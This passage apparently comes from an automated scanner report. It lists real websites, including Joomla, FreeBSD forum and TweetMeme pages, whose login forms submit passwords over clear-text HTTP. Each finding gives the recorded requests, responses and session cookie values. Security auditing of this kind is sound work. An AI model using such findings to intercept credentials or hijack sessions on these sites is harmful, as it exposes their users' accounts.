P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 61417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/extensions" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.14. http://extensions.joomla.org/extensions/languages/translations-for-joomla previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://extensions.joomla.org
Path:	/extensions/languages/translations-for-joomla

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://extensions.joomla.org/extensions

The form contains the following password field:

passwd

Request

GET /extensions/languages/translations-for-joomla HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=119690ae64f99e48cab89680209b4270; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 72889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/extensions" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.15. http://extensions.joomla.org/extensions/new previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://extensions.joomla.org
Path:	/extensions/new

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://extensions.joomla.org/extensions

The form contains the following password field:

passwd

Request

GET /extensions/new HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=bd83a0d831a42c661eb59a60c147c8f6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 78217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/extensions" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.16. http://fastdial.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fastdial.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://fastdial.com/welcome-fast-dial-firefox-4?destination=node%2F3

The form contains the following password field:

pass

Request

GET / HTTP/1.1
Host: fastdial.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:03:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESScb6e13bb9b3cdf11f80b4ccf0f07b677=c1uvnu853h51tppmts56d4vm81; expires=Thu, 17-Feb-2011 05:36:34 GMT; path=/; domain=.fastdial.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:03:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 5182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><form action="/welcome-fast-dial-firefox-4?destination=node%2F3" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

6.17. http://fastdial.com/0 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fastdial.com
Path:	/0

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://fastdial.com/welcome-fast-dial-firefox-4?destination=node%2F3

The form contains the following password field:

pass

Request

GET /0 HTTP/1.1
Host: fastdial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESScb6e13bb9b3cdf11f80b4ccf0f07b677=c1uvnu853h51tppmts56d4vm81;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:05:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:05:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 5182
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><form action="/welcome-fast-dial-firefox-4?destination=node%2F3" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

6.18. http://fastdial.com/user previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fastdial.com
Path:	/user

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://fastdial.com/user

The form contains the following password field:

pass

Request

GET /user HTTP/1.1
Host: fastdial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESScb6e13bb9b3cdf11f80b4ccf0f07b677=c1uvnu853h51tppmts56d4vm81;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:05:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:05:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 4772
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="clear-block">
<form action="/user" accept-charset="UTF-8" method="post" id="user-login">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="128" size="60" class="form-text required" />
<div class="description">
...[SNIP]...

6.19. http://fastdial.com/website previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fastdial.com
Path:	/website

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://fastdial.com/website?destination=website

The form contains the following password field:

pass

Request

GET /website HTTP/1.1
Host: fastdial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESScb6e13bb9b3cdf11f80b4ccf0f07b677=c1uvnu853h51tppmts56d4vm81;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:05:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:05:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><form action="/website?destination=website" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

6.20. http://fastdial.com/welcome-fast-dial-firefox-4 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fastdial.com
Path:	/welcome-fast-dial-firefox-4

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://fastdial.com/welcome-fast-dial-firefox-4?destination=node%2F3

The form contains the following password field:

pass

Request

POST /welcome-fast-dial-firefox-4?destination=node%2F3 HTTP/1.1
Host: fastdial.com
Proxy-Connection: keep-alive
Referer: http://fastdial.com/
Cache-Control: max-age=0
Origin: http://fastdial.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESScb6e13bb9b3cdf11f80b4ccf0f07b677=c1uvnu853h51tppmts56d4vm81
Content-Length: 98

name=&pass=&op=Log+in&form_build_id=form-f79ff6c4b14a4b6ff80bfa544715655b&form_id=user_login_block

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:03:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:03:34 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 5321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><form action="/welcome-fast-dial-firefox-4?destination=node%2F3" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required error" />
</div>
...[SNIP]...

6.21. http://forum.joomla.org/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.joomla.org
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://forum.joomla.org/ucp.php?mode=login&sid=3b5661e788faab67f2027dc376b326d5

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: forum.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:53 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: phpbb3_cnuw3_u=1; expires=Tue, 24-Jan-2012 15:11:53 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_k=; expires=Tue, 24-Jan-2012 15:11:53 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_sid=3b5661e788faab67f2027dc376b326d5; expires=Tue, 24-Jan-2012 15:11:53 GMT; path=/; domain=forum.joomla.org; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 103386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en
...[SNIP]...
<br clear="all" class="breakpad" />

   <form method="post" action="./ucp.php?mode=login&sid=3b5661e788faab67f2027dc376b326d5">

   <table class="tablebg" width="100%" cellspacing="1">
...[SNIP]...
</span> <input class="post" type="password" name="password" size="10" />  <span class="gensmall">
...[SNIP]...

6.22. http://forum.joomla.org/ucp.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.joomla.org
Path:	/ucp.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://forum.joomla.org/ucp.php?mode=login&sid=19d91383ba404ea6abc69bff18558c0e

The form contains the following password field:

password

Request

GET /ucp.php HTTP/1.1
Host: forum.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.23. http://forum.joomla.org/viewforum.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.joomla.org
Path:	/viewforum.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://forum.joomla.org/ucp.php?mode=login&sid=37cbf4e15f54f7989d066007eee62641

The form contains the following password field:

password

Request

GET /viewforum.php?f=511 HTTP/1.1
Host: forum.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.24. http://forumas.lithuanianjoomla.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forumas.lithuanianjoomla.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://forumas.lithuanianjoomla.com/ucp.php?mode=login&sid=6bb0e598b965dee060e98ad373f62147

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: forumas.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:35:40 GMT
Server: Apache
Set-Cookie: phpbb3_9muwo_u=1; expires=Tue, 24-Jan-2012 22:35:40 GMT; path=/; domain=forumas.lithuanianjoomla.com; HttpOnly
Set-Cookie: phpbb3_9muwo_k=; expires=Tue, 24-Jan-2012 22:35:40 GMT; path=/; domain=forumas.lithuanianjoomla.com; HttpOnly
Set-Cookie: phpbb3_9muwo_sid=6bb0e598b965dee060e98ad373f62147; expires=Tue, 24-Jan-2012 22:35:40 GMT; path=/; domain=forumas.lithuanianjoomla.com; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="lt-lt" xml:lang="lt-lt">
<head>
...[SNIP]...
</div>
       <form method="post" action="./ucp.php?mode=login&sid=6bb0e598b965dee060e98ad373f62147" class="headerspace">
       <h3>
...[SNIP]...
</label> <input type="password" name="password" id="password" size="10" class="inputbox" title="Slapta..odis" />
                           | <label for="autologin">
...[SNIP]...

6.25. http://forums.freebsd.org/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forums.freebsd.org
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://forums.freebsd.org/login.php?do=login

The form contains the following password field:

vb_login_password

Request

GET / HTTP/1.1
Host: forums.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:56 GMT
Server: Apache/2.2.17 (FreeBSD)
Set-Cookie: bblastvisit=1295881916; expires=Tue, 24-Jan-2012 15:11:56 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Tue, 24-Jan-2012 15:11:56 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 50678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <!-
...[SNIP]...

       <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

6.26. http://help.tweetmeme.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://help.tweetmeme.com/wp-login.php

The form contains the following password field:

Request

GET / HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=jcahvhmi593kcks9omcs8qbp63; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16911

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<li>
<form action="http://help.tweetmeme.com/wp-login.php" method="post">
<fieldset>
...[SNIP]...
<label for="pwd">Password
<input type="password" name="pwd" id="pwd" size="22" class="text" /></label>
...[SNIP]...

6.27. http://help.tweetmeme.com/2009/04/07/api-documentation/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/2009/04/07/api-documentation/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://help.tweetmeme.com/wp-login.php

The form contains the following password field:

Request

GET /2009/04/07/api-documentation/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:01:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=fri7ds4g5e569ab52b67udmd34; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<li>
<form action="http://help.tweetmeme.com/wp-login.php" method="post">
<fieldset>
...[SNIP]...
<label for="pwd">Password
<input type="password" name="pwd" id="pwd" size="22" class="text" /></label>
...[SNIP]...

6.28. http://help.tweetmeme.com/2009/04/09/rss-feeds/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/2009/04/09/rss-feeds/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://help.tweetmeme.com/wp-login.php

The form contains the following password field:

Request

GET /2009/04/09/rss-feeds/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:01:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=dea45f6dnud0kld58ppcjlmap1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<li>
<form action="http://help.tweetmeme.com/wp-login.php" method="post">
<fieldset>
...[SNIP]...
<label for="pwd">Password
<input type="password" name="pwd" id="pwd" size="22" class="text" /></label>
...[SNIP]...

6.29. http://help.tweetmeme.com/2009/04/09/twitter-feeds/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/2009/04/09/twitter-feeds/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://help.tweetmeme.com/wp-login.php

The form contains the following password field:

Request

GET /2009/04/09/twitter-feeds/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=6fjaaa6od3bhvj75ou4s3p06f2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<li>
<form action="http://help.tweetmeme.com/wp-login.php" method="post">
<fieldset>
...[SNIP]...
<label for="pwd">Password
<input type="password" name="pwd" id="pwd" size="22" class="text" /></label>
...[SNIP]...

6.30. http://help.tweetmeme.com/contact/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/contact/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://help.tweetmeme.com/wp-login.php

The form contains the following password field:

Request

GET /contact/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=p918mp9o4urak293n2lk14io61; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<li>
<form action="http://help.tweetmeme.com/wp-login.php" method="post">
<fieldset>
...[SNIP]...
<label for="pwd">Password
<input type="password" name="pwd" id="pwd" size="22" class="text" /></label>
...[SNIP]...

6.31. http://help.tweetmeme.com/forum/forum/33 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/forum/forum/33

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://help.tweetmeme.com/wp-login.php

The form contains the following password field:

Request

GET /forum/forum/33 HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Content-Length: 6371
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US">
<head>
<meta http-equiv="Content-Type
...[SNIP]...
<li>
<form action="http://help.tweetmeme.com/wp-login.php" method="post">
<fieldset>
...[SNIP]...
<label for="pwd">Password
<input type="password" name="pwd" id="pwd" size="22" class="text" /></label>
...[SNIP]...

6.32. http://help.tweetmeme.com/language/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/language/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://help.tweetmeme.com/wp-login.php

The form contains the following password field:

Request

GET /language/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=evippa6a47912f617v4ke1qlu5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<li>
<form action="http://help.tweetmeme.com/wp-login.php" method="post">
<fieldset>
...[SNIP]...
<label for="pwd">Password
<input type="password" name="pwd" id="pwd" size="22" class="text" /></label>
...[SNIP]...

6.33. http://it.toolbox.com/blogs/database-soup previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/database-soup

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://it.toolbox.com/blogs/database-soup

The form contains the following password field:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/database-soup HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
